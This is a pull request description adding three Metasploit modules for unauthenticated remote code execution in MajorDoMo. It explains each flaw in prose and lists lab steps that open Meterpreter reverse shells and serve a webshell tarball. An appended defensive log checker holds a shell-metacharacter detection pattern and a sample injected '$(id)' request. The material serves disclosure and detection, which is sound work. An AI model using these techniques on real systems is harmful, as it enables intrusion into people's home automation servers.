Add three MajorDoMo unauthenticated RCE modules #21000

Open
Chocapikk wants to merge 1 commit into rapid7:master from Chocapikk:add-modules-majordomo-rce
@Chocapikk
Contributor

Hello Metasploit Team,

This PR adds three exploit modules for MajorDoMo, an open-source home automation platform. All three vulnerabilities are unauthenticated and affect every version up to and including the latest release. The fix is tracked in sergejey/majordomo#1177.

Blog post with full technical details: https://chocapikk.com/posts/2026/majordomo-revisited/

Modules

1. exploit/multi/http/majordomo_console_eval_rce (CVE-2026-27174)

Unauthenticated PHP eval via the admin console. A missing exit after redirect("/") in panel.class.php allows execution to continue into the AJAX handler, which passes user input directly to eval() via evalConsole(). Single GET request to /admin.php.

2. exploit/multi/http/majordomo_cmd_injection_rce (CVE-2026-27175)

Command injection via rc/index.php. The param parameter is interpolated into double quotes without escapeshellarg() and queued into the safe_execs table via safe_exec(). The cycle_execs.php worker is web-accessible without authentication - the module starts it, waits for it to enter its polling loop, then injects the payload. The worker picks it up within one second and passes it to exec().

3. exploit/multi/http/majordomo_supply_chain_rce (CVE-2026-27180)

Update poisoning via the saverestore module. Two unauthenticated GET requests: the first poisons MASTER_UPDATE_URL to point to an attacker-controlled server, the second triggers autoUpdateSystem() which fetches a tarball and deploys it to the webroot via copyTree(). The module serves a fake Atom feed and a tarball containing a PHP webshell.

Targets

  • Modules 1 and 3 support PHP In-Memory, Unix/Linux CMD, and Windows CMD targets
  • Module 2 supports Unix/Linux CMD and Windows CMD targets (OS command injection, not PHP eval)

Verification

Docker Lab Setup (shared by all three modules)

mkdir majordomo-lab && cd majordomo-lab
git clone https://github.com/sergejey/majordomo.git src
cd src && git checkout 41086aaa && cd ..

See the module documentation for full Dockerfile, entrypoint.sh, and docker-compose.yml. MajorDoMo will be available at http://127.0.0.1:8899.

Module 1: Console Eval RCE

  • Start msfconsole
  • use exploit/multi/http/majordomo_console_eval_rce
  • set RHOSTS 127.0.0.1
  • set RPORT 8899
  • set PAYLOAD php/meterpreter/reverse_tcp
  • set LHOST 172.17.0.1
  • check - Verify it returns Vulnerable
  • run - Verify a Meterpreter session opens as www-data

Module 2: Command Injection RCE

  • use exploit/multi/http/majordomo_cmd_injection_rce
  • set RHOSTS 127.0.0.1
  • set RPORT 8899
  • set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
  • set LHOST 172.17.0.1
  • set FETCH_SRVHOST 172.17.0.1
  • check - Verify it returns Vulnerable
  • run - Verify a Meterpreter session opens as www-data

Module 3: Supply Chain RCE

  • use exploit/multi/http/majordomo_supply_chain_rce
  • set RHOSTS 127.0.0.1
  • set RPORT 8899
  • set PAYLOAD php/meterpreter/reverse_tcp
  • set LHOST 172.17.0.1
  • set SRVHOST 172.17.0.1
  • check - Verify it returns Vulnerable
  • run - Verify a Meterpreter session opens as www-data

Documentation

- CVE-2026-27174: Console eval RCE via missing exit after redirect
- CVE-2026-27175: Command injection via rc/index.php + cycle_execs race condition
- CVE-2026-27180: Supply chain RCE via update URL poisoning in saverestore module

All three modules include documentation with Docker lab setup instructions.
@dledda-r7 dledda-r7 added module docs rn-modules release notes for new or majorly enhanced modules labels Feb 23, 2026
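
A defender-side log check for the CVE-2026-27175 sequence described in the PR (the worker requested over HTTP, followed by a `param` value carrying shell metacharacters from the same client), added here as an example that is not part of the PR or of Metasploit. The Common/Combined Log Format, the function names, the sample lines and the worker's directory are assumptions or constructed values.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Characters that end or change the meaning of a double-quoted shell string.
SHELL_META = re.compile(r'[`$"\\;|&<>\r\n]')
# Client address and request target from a Common/Combined Log Format line (assumed format).
LINE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) [^"]*" \d{3}')

def classify(line):
    """Return (client_ip, finding) for one log line; finding is None if nothing matched."""
    m = LINE.match(line)
    if not m:
        return None, None
    url = urlsplit(m["target"])
    path = url.path.lower()
    # The worker is a background job, so any HTTP request for it deserves review.
    if path.endswith("/cycle_execs.php"):
        return m["ip"], "worker-over-http"
    if path.endswith("/rc/index.php"):
        # parse_qs percent-decodes, so encoded metacharacters are caught too.
        values = parse_qs(url.query, keep_blank_values=True).get("param", [])
        if any(SHELL_META.search(v) for v in values):
            return m["ip"], "metachar-in-param"
    return m["ip"], None

def suspicious_clients(lines):
    """Clients that requested the worker and later sent metacharacters in param."""
    started, flagged = set(), []
    for line in lines:
        ip, finding = classify(line)
        if finding == "worker-over-http":
            started.add(ip)
        elif finding == "metachar-in-param" and ip in started and ip not in flagged:
            flagged.append(ip)
    return flagged

# Constructed sample lines (not captured traffic); the worker's directory is a placeholder.
SAMPLE = [
    '198.51.100.7 - - [23/Feb/2026:10:00:01 +0000] "GET /PLACEHOLDER_DIR/cycle_execs.php HTTP/1.1" 200 0',
    '192.0.2.10 - - [23/Feb/2026:10:00:02 +0000] "GET /rc/index.php?param=50 HTTP/1.1" 200 2',
    '198.51.100.7 - - [23/Feb/2026:10:00:03 +0000] "GET /rc/index.php?param=%24%28id%29 HTTP/1.1" 200 2',
    '192.0.2.10 - - [23/Feb/2026:10:00:04 +0000] "GET /rc/index.php?param=a%3Bb HTTP/1.1" 200 2',
]

if __name__ == "__main__":
    print(suspicious_clients(SAMPLE))
```

A metacharacter in `param` from a client that never touched the worker is still reported by `classify`; only `suspicious_clients` requires the two-step sequence.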